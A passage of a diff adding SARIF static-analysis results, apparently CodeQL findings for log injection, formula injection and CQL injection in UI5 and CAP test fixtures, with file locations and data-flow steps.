[user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 25, + "startColumn" : 26, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "191c273ff0751536:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... , true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 25, + "startColumn" : 26, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 17, + "startColumn" : 38, + "endColumn" : 47 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "f32b0dcd4573d6a3:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 50, + "endColumn" : 55 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 43, + "endColumn" : 56 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 33, + "endColumn" : 57 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 21, + "endColumn" : 57 + } + }, + "message" : { + "text" : "sanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 17, + "startColumn" : 38, + "endColumn" : 47 + } + }, + "message" : { + "text" : "sanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "392fd43c95c7be9c:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + }, + "region" : { + "startLine" : 6, + "startColumn" : 5, + "endLine" : 8, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + }, + "region" : { + "startLine" : 6, + "startColumn" : 5, + "endLine" : 8, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 16, + "startColumn" : 30, + "endColumn" : 35 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "27d08bf2c216b384:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 22 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 14, + "startColumn" : 21, + "endColumn" : 49 + } + }, + "message" : { + "text" : "oModel. ... input\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 14, + "startColumn" : 13, + "endColumn" : 49 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 16, + "startColumn" : 30, + "endColumn" : 35 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "392fd43c95c7be9c:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 17, + "startColumn" : 27, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "41899ff1a967017d:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 17, + "startColumn" : 27, + "endColumn" : 45 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 23, + "startColumn" : 27, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "9afa5fd07ee36af6:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 9, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 58 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 46, + "endColumn" : 59 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 36, + "endColumn" : 60 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 21, + "endColumn" : 60 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 23, + "startColumn" : 27, + "endColumn" : 39 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 16, + "startColumn" : 23, + "endColumn" : 51 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e701acdf85af03b4:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 16, + "startColumn" : 23, + "endColumn" : 51 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 13, + "startColumn" : 36, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e5ae8639cd6967fb:1", + "primaryLocationStartColumnFingerprint" : "29" + }, + "codeFlows" : [ { + "threadFlows" : [ { + 